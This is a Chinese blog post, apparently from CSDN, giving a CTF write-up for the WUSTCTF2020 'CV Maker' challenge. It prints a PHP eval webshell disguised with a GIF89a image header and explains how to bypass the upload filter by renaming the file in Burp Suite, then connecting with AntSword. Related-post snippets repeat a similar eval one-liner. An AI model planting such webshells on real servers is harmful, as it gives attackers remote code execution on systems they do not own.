[WUSTCTF2020]CV Maker

已于 2023-09-22 18:02:06 修改
阅读量111 收藏
点赞数
分类专栏: CTF 文章标签: android 网络安全 计算机网络 web安全 python
于 2023-09-22 17:58:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wp568/article/details/133179555
版权

先注册一个账号,然后登录。

发现可以上传图片,试试图片码🐎,

GIF89a
<script language='php'> @eval($_POST['hacker']);</script>

 将这段代码粘贴到txt,文件另存为1juhua.php.jpg,然后用burpsuit 上传抓包

把名字 1juhua.php.jpg的末尾.jpg去掉上传,得到文件上传地址uploads/d41d8cd98f00b204e9800998ecf8427e.php

打开http://27fcb32e-627c-4a7f-aab4-af9ea8abafa7.node4.buuoj.cn:81/uploads/d41d8cd98f00b204e9800998ecf8427e.phpx

显示:

GIF89a

证明一句话图片码上传成功,利用中国蚁剑连接

得到flag

半两八金
关注
专栏目录
文件上传&中国菜刀 —— 【WUST-CTF2020CV Maker
Ve99tr’s Blog
03-30 1818
图片马文件上传以及使用中国菜刀连接服务器
计算机视觉(Computer Vision,CV)四大基本任务--分类、检测、定位、分割
weixin_43331421的博客
06-20 1290
计算机视觉(Computer Vision,CV)是一门研究如何让机器具备“看”的能力的学科,最基本的任务包含四项:分类、定位、检测和分割;可以说其他关键任务都是在四项基本任务的基础上延伸开来的。
[WUSTCTF2020]CV Maker 1
ubaichu的博客
07-23 427
[WUSTCTF2020]CV Maker 1 很简单的一道
BUUCTF--[WUSTCTF2020]CV Maker
qq_46263951的博客
07-06 1324
一开始我们看到是一个注册页面,应该没有什么可用的漏洞,注册进去看看 进入之后看到需要我们更改头像,应该是一个文件上传漏洞,当上传一个php文件时出现一个这样的错误 通过查询我们可以了解到该函数是用来检测文件头的,也就是需要我们构造一个文件头为图像类型的php一句话木马 注意:文件头和一句话木马不可放在同一行 GIF89 <?php eval($_POST['123']); ?> 上传成功后我们通过查看网页源码发现图片路径 通过蚁剑连接即可 ...
af2020cv-2020-05-09-v5-dev.zip
08-30
在实际应用中,这样的数据集可能被用于计算机视觉研究,尤其是图像识别和分类任务,比如训练深度学习模型来自动识别海底鱼类。此外,它也可能被生态学家、海洋生物学家或保护主义者用来研究鱼类分布、种群动态或环境...
在计算机视觉(Computer Vision, CV)领域,识别与处理资源包括各种算法、工具、数据集和框架
最新发布
07-28
在计算机视觉(Computer Vision, CV)领域,识别与处理资源包括各种算法、工具、数据集和框架
cv-maker
03-21
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: yarn start 在开发模式下运行应用程序。打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。您还将在控制台中看到任何棉绒...
[WUSTCTF2020]CV Maker——简单的开始
Mrs_H的博客
01-15 1134
[WUSTCTF2020]CV Maker 一.前言 emm,有关ssrf的题目在这期间做了几道,大部分都是关于redis和fpm的,这些题目中大多数都是直接用现成已经在市面上广为流行的脚本进行攻击的。事实上,并没有过多的参考价值,也就没有写下他们的wp。最近在复习数学,也没有时间打靶场了,拿这道最简单不过的文件上传题目,来开文件上传的坑吧。不知道什么时候能把坑填完。 二.正文 首先,我们拿到这个题目。(这道题的前端不错 首页就是一个注册的界面,也没有什么东西于是就注册一个账号登进去先看看 ps:这里要说
[WUSTCTF2020]CV Maker1 --不会编程的崽
不会编程的崽的博客
02-19 613
文件上传
[WUSTCTF2020]CV Maker 文件头检查
m0_64180167的博客
09-27 127
就是检查文件头 那我们直接修改文件头上传即可。报错了我们去看看 这个 exif是什么。我们直接随便上传一个看看。很显然是我们文件上传。
2020年度顶级计算机视觉与AI会议概览:时间地点与投稿关键
- **ICCV (International Conference on Computer Vision)**: 是计算机视觉领域最重要的会议之一,每两年举行一次。最近几届的举办情况如下: - ICCV 2019: 于2019年10月27日至11月3日在韩国首尔举行,投稿截止...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半两八金

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值